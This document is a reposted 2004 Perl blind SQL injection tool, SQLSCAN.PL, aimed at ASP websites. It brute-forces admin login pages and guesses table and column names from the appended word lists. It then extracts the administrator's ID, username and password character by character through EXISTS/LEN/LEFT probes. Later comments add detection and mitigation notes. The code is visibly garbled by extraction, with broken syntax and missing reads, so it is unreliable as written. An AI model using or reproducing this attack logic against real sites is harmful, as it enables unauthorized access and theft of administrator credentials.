ASCC + ASP automatically injects code, you can guess inner


SQLSCAN.PL

Submitted by Superhei On 2004, July 8, 2:17 Am. My DD

#! / usr / bin / perl

#Codz by black 嘿 black 2004/1/21.

#Thx Mix

# Unbuffered STDOUT so the one-character-per-guess progress output printed
# by the crack subs below shows up as it happens, not at exit.
$ | = 1;

# Sole dependency: a raw TCP client socket (see Sock() at the end). There is
# no HTTP library; every request is hand-assembled text.
Use IO :: Socket;

# Banner and usage text. NOTE: this listing has been mangled by extraction
# (spaces inside sigils, "/ n" where "\n" stood, keywords in random case,
# "<FH>"/"<STDIN>" reads dropped). It is preserved as posted and does not
# run in this form.
PRINT "=================================================================================================================================================== ======================== / n ";

Print "The SQLFORM-FIND SCRIPT CODZ by Black / N";

Print "Our Team: www.cnse8.com / n";

Print "My Home: XYHACK.91I.NET / N";

PRINT "=================================================================================================================================================== ======================== / n ";

Print "Usage: SQL.EXE 127.0.0.1 80 /test/wenxue/readArticle.asp?id=3 test success / N";

Print "---------------------------------------------- ----------------------- / n ";

# Argument handling. As posted, the "if ($#ARGV < 1)" below has no body (an
# interactive usage() sub exists at the end of the file and was presumably
# meant to be called here), and the "> 1" branch opens a brace that no later
# line of this listing closes.
IF ($ # argv <1)

IF ($ # argv> 1) {

# Positional arguments: target host, TCP port, the request path including
# its query string, and the "judge" string. The judge string is a fragment
# of page text whose presence in a response is taken to mean "the injected
# condition evaluated true" (see the grep calls in the main loop). That
# content-based true/false oracle is what the server side must not expose:
# parameterised queries remove the injection, and returning the same page
# for failed conditions removes the signal.
$ Host = $ argv [0];

$ port = $ argv [1];

$ WAY = $ argv [2];

$ Judge = $ Argv [3];

# Word lists (table names, column names, login-page names); their contents
# are reproduced after the script. All three use 2-argument open on a
# bareword handle; the "<FH>" on each "@... = ;" line was lost in
# extraction. The first die message says splfrom.txt while the file opened
# is SQLFROM.TXT. Because the listing's case is mangled, identifiers as
# printed (e.g. @Form here) need not match their later uses.
Open (DB, 'SQLFROM.TXT') || DIE "can't open splfrom.txt."

@Form = ;

Close (DB);

Open (l, 'lines.txt') || DIE "can't open lines.txt."

@lines = ;

Close (L);

Open (lg, 'login.txt') || DIE "can't open login.txt."

@Login = ;

CLOSE (LG);

# Login-page discovery: one GET per name in login.txt, addressed to the
# directory of the target path (assembled in str1()). Every line of each
# response is split on single spaces and its second field compared with
# 200, so this only acts as a status-line check as long as no body line has
# "200" as its second word. From the server side this is a burst of
# requests for admin/login file names from one client, mostly 404s with an
# occasional 200 — a straightforward access-log pattern.
Foreach $ log (@login) {

CHOMP $ LOG;

@ RES = STR1 ();

Foreach $ check (@res) {

# Split is applied to every response line, not just the first one.
($ HTTP, $ CODE, $ blah) = split (/ /, $ check);

IF ($ code == 200) {

Print "Kaka !! Find the login: http:// $ host $ way1 $ log / n";

}

}

}

# Schema guessing by boolean-based blind injection. For each candidate
# table the request built in STR() carries "AND EXISTS(SELECT $line FROM
# <table>)" in the query string; $line is first "*" (does the table exist)
# and then each name from lines.txt (does the column exist). A probe counts
# as true when the judge string appears anywhere in the response. Each
# probe is a separate request, so the literal "%20and%20exists(select" (or
# any SQL keyword inside a numeric id parameter) is the string a WAF rule
# or log search should key on; parameterised queries on the server remove
# the underlying vulnerability.
Foreach $ sqlfrom (@form) {

CHOMP $ SQLFROM;

# Table-existence probe: SELECT * FROM <table>.
$ line = "*";

@ res = Str ();

# Any response line matching the judge string -> condition treated as true.
@ Num = grep / $ judge /, @res;

$ SIZE = @ Num;

IF ($ SIZE> 0) {

Print "/ nkaka !! Find the SQLFROM IS / U / A / A $ SQLFROM / E: / N";

# Column-existence probes against the table just confirmed.
Foreach $ line1 (@lines) {

CHOMP $ LINE1;

$ line = $ line1;

@ res = Str ();

@ Num = grep / $ judge /, @res;

$ SIZE = @ Num;

IF ($ SIZE> 0) {

Print "/ a $ line1 / n";

}

}

}

}

# Interactive phase: reads the confirmed table name and its id / username /
# password column names from STDIN (the "<STDIN>" on each "= ;" was lost in
# extraction; "kHomp" is a mangled chomp). The listing's spelling of the
# column variables is not consistent between these prompts and the SQL
# strings below, another artefact of the extraction.
Print "/ a / a / ninput the SQLFORM of Admin! / N $ SQLFORM ="; $ SQLFORM = ; kHomp $ SQLForm;

Print "$ ID ="; $ IDS = ; kHomp $ IDS;

Print "$ usrname ="; $ usrnames = ; kHomp $ usernames;

Print "$ Password ="; $ Passwords = ; kHomp $ Passwords;

Print "/ n / nnow, start to crack! please wait ... / n / n";

# Injected SQL fragments. $PATH1/$PATH2/$PATH3 are globals read by
# crackint() and crackchar(): they are the fixed prefix and suffix of the
# injected condition, and the crack subs splice the current guess between
# them. The "% 20D% 20" at the start of each fragment is presumably the
# remains of "%20AND%20" after extraction.

# Step 1 - locate a row: EXISTS(SELECT id FROM t WHERE id = N), N = 1..100.
$ PATH1 = "% 20D% 20Exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20 $ IDS =";

$ PATH2 = ")"

$ ID = CRACKINT ();

Print "/ n / nsuccessful, the id of the first admin's ID is / a $ ID ./N";

# Step 2 - password length: ... WHERE LEN(<password col>) = N AND id = $ID.
$ PATH1 = "% 20D% 20exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20LEN ($ Passwords) ="

$ PATH2 = "% 20And% 20 $ IDS = $ ID)";

$ len = crackint ();

Print "/ N / NSuccessful, The Len of Admin $ Password IS / A $ LEN ./N/N";

# Step 3 - password text, one position at a time:
# ... WHERE LEFT(<password col>, j) = '<prefix so far + guess>' AND id = ...
# Note $PATH3 as posted compares against the bare word ID, not $ID.
$ PATH1 = "% 20D% 20Exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20LEFT ($ Passwords,";

$ PATH2 = ") = '";

$ PATH3 = "'% 20and% 20 $ IDS = ID)"; @password = crackchar ();

Print "/ N / NSuccessful, The Admin's Password IS / A / A @ Password ./n";

# Step 4 - the same length-then-characters sequence for the username column.
$ PATH1 = "% 20D% 20exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20LEN ($ usernames) ="

$ PATH2 = "% 20And% 20 $ IDS = $ ID)";

$ len = crackint ();

Print "/ N / NSuccessful, The Len of Admin's Name is $ LEN ./n/n";

$ PATH1 = "% 20D% 20Exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20LEFT ($ usrnames,";

$ PATH2 = ") = '";

$ PATH3 = "'% 20And% 20 $ IDS = ID)";

@Username = crackchar ();

Print "/ n / nsuccessful, the admin's username is / a / a @ username ./n/n";

Print "Kaka !! / A / A / You can use / NUSERNAME: @ username / npassword: @ password / nto login test! / r / n";

# crackint - linear search over the integers 1..100.
#
# For each N the request path is "$WAY" . $PATH1 . N . $PATH2 and the
# response is checked for the judge string; the first N that matches is
# returned. Reads the globals $PATH1, $PATH2, $WAY, $Host and $judge;
# prints each guess as progress and sleeps 1 s before every request. If no
# value in 1..100 matches, control falls off the end of the loop and the
# sub's value is whatever the last evaluated expression left (no explicit
# return for that case). The "Last" after "RETURN" is unreachable.
#
# Detection angle: up to 100 GETs at a steady one-per-second cadence, with
# identical Referer and Host headers, HTTP/1.0, and a query string that
# differs only in a trailing number - a very regular shape in access logs.
Sub crackint {

@ DIC = (1..100);

For ($ I = 0; $ i <@dic; $ i )

{

# Path = fixed prefix . current guess . fixed suffix ("my" is redeclared
# on the next line rather than reassigned, as posted).
MY $ PATH = $ PATH1. $ DIC [$ I];

MY $ PATH = $ PATH. $ PATH2;

# Hand-built HTTP/1.0 request; "/ R / N" stood for "\r\n" before extraction.
$ REQ = "Get $ WAY $ PATH HTTP / 1.0 / R / N".

"REFERER: http:// $ host $ way / r / n".

"Host: $ Host / N / N";

# Progress: the value currently being tried.
Print "$ DIC [$ I]."

# Fixed 1 s pause between probes.
Sleep (1);

@IN = SOCK ($ REQ);

@n = grep / $ judge /, @IN;

$ SIZE = @ Num;

IF ($ SIZE> 0) {

RETURN $ DIC [$ I];

Last;

}

}

}

# crackchar - recovers a string one character at a time.
#
# For position j = 1..$g (note: $g is never assigned anywhere in this
# listing - presumably the length obtained from crackint()), each candidate
# character is appended to the prefix recovered so far and the path
# "$WAY" . $PATH1 . j . $PATH2 . prefix+candidate . $PATH3 is requested;
# the first candidate whose response contains the judge string is kept.
# Candidate alphabet, in order: digits, a..z (listed twice as posted),
# URL-encoded ASCII punctuation (%25, %26 and %2b stand in for %, & and +)
# and a second list of full-width punctuation. The three substitutions at
# the end (garbled in extraction) appear to map those encoded %25/%26/%2b
# sequences back to the literal characters before the string is returned.
# Reads the same globals as crackint() plus $PATH3; returns the recovered
# string.
#
# Detection angle: identical request shape and 1 s cadence as crackint();
# successive requests differ only in the position number and a growing
# quoted prefix inside a LEFT(...) = '...' comparison.
Sub crackchar {

MY $ PWS;

My @ DIC11 = (0..9);

my @ DIC12 = (a..z);

My @ DIC13 = (a..z);

MY @ special = QW (`~! @ # $% 25 ^% 26 * / (/) _% 2b = - {} []:"; <> |,. / /);

My @ special2 = qw (`~! · # ¥% ... - * () - - = {} []:"; '"│,. /, <>');

# Outer loop walks the string positions; $g has no assignment in this file.
My @dic = (@ DIC11, @ DIC12, @ DIC13, @ Special, @ special2); for ($ j = 1; $ j <= $ g; $ j )

{

# Inner loop tries every alphabet entry as the character at position j.
For ($ I = 0; $ i <@dic; $ i )

{

# Candidate value for the comparison: recovered prefix plus this guess.
MY $ key = $ PWS. $ DIC [$ I];

# Path = $PATH1 . j . $PATH2 . candidate . $PATH3 ("my" redeclared each
# line rather than reassigned, as posted).
MY $ PATH = $ PATH1. $ J;

MY $ PATH = $ PATH. $ PATH2;

MY $ PATH = $ PATH. $ key;

MY $ PATH = $ PATH. $ PATH3;

$ REQ = "Get $ WAY $ PATH HTTP / 1.0 / R / N".

"REFERER: http:// $ host $ way / r / n".

"Host: $ Host / N / N";

# Progress: the character currently being tried.
Print "$ DIC [$ I]."

# Fixed 1 s pause between probes.
Sleep (1);

@IN = SOCK ($ REQ);

@n = grep / $ judge /, @IN;

$ SIZE = @ Num;

IF ($ SIZE> 0) {

# Bareword "th" concatenated onto the position number for the message.
$ TH = $ j.th;

Print "/ NSuccessful, The $ th Word of The Char IS $ DIC [$ I] / N";

# Accept this character and move to the next position.
$ PWS = $ PWS. $ DIC [$ I];

Last;

}

}

}

# Undo the URL encoding used in the candidate alphabet (lines garbled as posted).
$ PWS = ~ s //% 2b // / ig;

$ PWS = ~ S / /% 25 //% / IG;

$ PWS = ~ s //% 26 // & / ig;

Return $ PWS;

}

# STR - builds and sends the table/column existence probe used by the main
# loop.
#
# Appends "%20And%20exists(SELECT%20" . $line . "%20FROM%20$SQLFROM)" to
# $WAY and issues an HTTP/1.0 GET with Host, a misspelled "Referr:" header
# and an empty Cookie header, using bare "\n" line endings (crackint() and
# crackchar() use "\r\n"). Reads the globals $line, $SQLFROM, $WAY and
# $Host. There is no explicit return: the sub's value is that of its last
# statement, i.e. the response lines from Sock().
#
# Detection angle: both the constant misspelled "Referr:" header and the
# "%20and%20exists(select" query fragment are fixed strings a rule can match.
SUB STR {

$ PATH = "% 20And% 20exists (SELECT% 20". $ line. "% 20FROM% 20 $ SQLFROM)";

$ REQ = "get $ WAY $ PATH HTTP / 1.0 / N".

"Host: $ Host / N".

"Referr: $ Host / N".

"Cookie: / n / n";

# Value of the last statement is returned implicitly.
SOCK ($ REQ);

}

# str1 - builds and sends a GET for one login-page candidate.
#
# Intended to strip the last path segment from $WAY to obtain a directory
# ($WAY1, also used in the main loop's "found" message) and append the
# current $log entry. As posted the split delimiter is missing and the
# helper variables do not line up ($S, $s, $SS and $I are distinct names in
# Perl, and $SS is never assigned), so what is actually removed cannot be
# read off this listing. Same headers and bare "\n" line endings as STR().
# No explicit return: the sub's value is the response lines from Sock().
SUB str1 {

@ s = split (, $ WAY);

$ S = @ s;

$ s = @ s [$ I-1];

$ D = Length ($ SS);

$ E = Length ($ WAY);

# $WAY with $D trailing characters dropped.
$ WAY1 = Substr ($ WAY, 0, $ E- $ D);

$ REQ = "GET $ WAY1 $ log http / 1.0 / n".

"Host: $ Host / N".

"Referr: $ Host / N".

"Cookie: / n / n";

# Value of the last statement is returned implicitly.
SOCK ($ REQ);

}

# Sock - transport for every request in the script.
#
# Opens a fresh TCP connection to $Host:$port (IO::Socket::INET, plain
# HTTP, no TLS), writes the raw request text it is given, reads lines until
# the server closes the connection, closes the socket and returns the
# response lines as a list. Dies if the connection cannot be opened.
#
# One connection per request with HTTP/1.0 and no keep-alive, so each probe
# is a separate TCP session from the server's point of view.
Sub Sock {

MY ($ REQ) = @_;

MY $ Connection = IO :: Socket :: inet-> new (proto => "tcp",

Peeraddr => $ Host,

Peerport => $ port) || DIE "Sorry! Could Not connect to $ host / n";

# Request text is sent verbatim; the caller supplies all headers.
Print $ Connection $ Req;

# List-context read: everything up to EOF.
My @res = <$ connection>;

CLOSE $ Connection;

Return @res;

}

# usage - interactive fallback for the command-line arguments.
#
# Prompts on STDOUT and reads host, port, path and judge string from STDIN
# (the "<STDIN>" reads were lost in extraction; "kurt" and "kHomp" are
# mangled chomp). Assigns the globals directly; nothing in this listing
# calls it, see the empty "if ($#ARGV < 1)" near the top.
Sub usage {

Print "/ Ninput The Host Info! / N $ Host ="; $ host = ; kurt $ host; print "$ port ="; $ port = ; kHomp $ port;

Print "$ WAY ="; $ WAY = ; kHomp $ WAY;

Print "/ Input the Judge Words! / N $ JUDGE ="; $ JUDGE = ; kHomp $ Judge;

}

=================== =============================================================================================================================

SQLFROM.TXT:

admin

User

Users

Userinfo

Admin_UserInfo

Password

Adminuser

Manboard

Diaryuseruser

PWD

T_User

user

administrator

Lines.txt:

id

UserID

Username

USR

admin

Name

User

Userpwd

Password

PWD

Passwd

PSWORD

PASS

PWS

PWA

User_id

User_name

User_pass

admin_id

admin_name

Admin_pass

Admin_password

U_ID

U_NAME

U_password

AUID

APWD

Name

password

Login.txt:

Pass.asp

PASSWORD.ASP

Psd.asp

UserName / login.asp

Username / admin.asp

Denglu.asp

Login / admin.asp

Login / login.asp

admin_login.asp

Login_Admin.asp

UserLogin.asp

User.asp

User / login.asp

Admin / admin.asp

Admin / login.asp

admin.asp

Login.htm

admin_login / admin.asp

Login_ADMIN / LOGIN_ADMIN.ASP

Login.asp

AdmPast.asp

admin_login.asp

adminLogin.asp

Managenews / index.htm

Admin / admin_login.asp

Admin_index.asp

Adminn / Index.asp

Admin / AdminLogin.asp

Admin / Default.asp

Manage / login.asp

